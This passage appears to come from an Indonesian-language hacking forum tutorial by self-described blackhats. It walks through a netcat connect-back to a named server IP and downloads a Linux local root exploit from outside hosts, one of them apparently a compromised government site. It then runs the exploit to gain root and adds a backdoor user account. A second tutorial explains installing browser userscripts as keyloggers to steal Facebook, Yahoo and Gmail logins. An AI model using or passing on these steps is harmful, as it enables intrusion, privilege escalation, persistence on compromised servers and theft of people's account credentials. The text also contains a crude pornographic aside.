Gotcha !! ternyata gue berhasil connectback di server target
[linux@localhost ~]$ nc -vv 210.48.67.38 6969
Connection to 210.48.67.38 6969 port [tcp/acmsoda] succeeded!

=== STEP 4 ===
Kalau lo udah berhasil connectback di target server sekarang saat'a kita exploit
Ketik wget http://ourgears.com/linux.zip atau lwp-download http://diperta.jabarprov.go.id/images/galeri/linux.zip di console lo yang udah berhasil lo connectback tadi.
Dan kalau sudah lo extrack itu dengan cara unzip linux.zip kalau udah lo extrack lo liat disitu dan lo masuk ke folder linux-sendpage3 cara'a.
Ketik cd linux-sendpage3
Nah kalau sudah lo jalanin run atau exploit yang ada disitu.
ketik diconsole lo : ./exploit atau ./run
Dan lo liat kalau misal'a berhasil
ketik lagi : whoami; id
Priview :

Dan ternyata gue berhasil lagi masuk untuk jadi root di server target.
sh-3.1# whoami; id
root
uid=0(root) gid=0(root) groups=617(southernpaua)
sh-3.1#

=== STEP 5 ===
Nah sekarang walaupun lo udah jadi root di server itu tapi lo belum jadi root penuh di server target kalau lo mau jadi full root.
Ketik di console lo : su root
Nah kalau sudah sekarang terserah lo mau diapain ntu target kalau misal'a mau lo addsuer ketik aja lagi :
adduser z0mb13
atau
useradd z0mb13
kalau gak bisa lagi ketik
/usr/sbin/adduser z0mb13

Dan buat ngasih password'a lo ketik
passwd z0mb13

Sorry ye kalau gue gak ngajarin sampe massdeface'a i'm still blackhat 0-day and no full dissclosure and us your imagination.
Udah ah capek gue ngetik teros sekarang saatnya nonton bokep yang dari pakde setanmuda dihadiahkan untuk saya.

credit : z0mbi3..

Keylogger Facebook With USer Script By bl4ck_sh4d0w...

Maap buat yg udh master,ni cuma buat newbie aje....bruakakak

sebener nya gue gak sengaja nemuin script ini..
pas di test ternyata asyik juga....hahaha
langsung aje dech ni tutor nya....

1.Buka Mozilla Lu...
2.Lalu instal addons ini https://addons.mozilla.org/en-US/firefox/addon/748
3.Setela selesai instal,lu restart mozilla lu..
4.Setela masuk lagi ke mozilla,dan buka halaman web ini http://userscripts.org/scripts/show/72590
5.Klik Install.
6.Setelah diinstall suscess,restart kembali mozilla Anda..
7.Sukses,keylogger buat facebook selesai...

Oh iy, kalo mau buat keylogger di yahoo and gmail juga bisa..
tinggal instal script nya,,,
For Yahoo : http://userscripts.org/scripts/show/72593
For Gmail : http://userscripts.org/scripts/show/72594

Thanks To :
malako...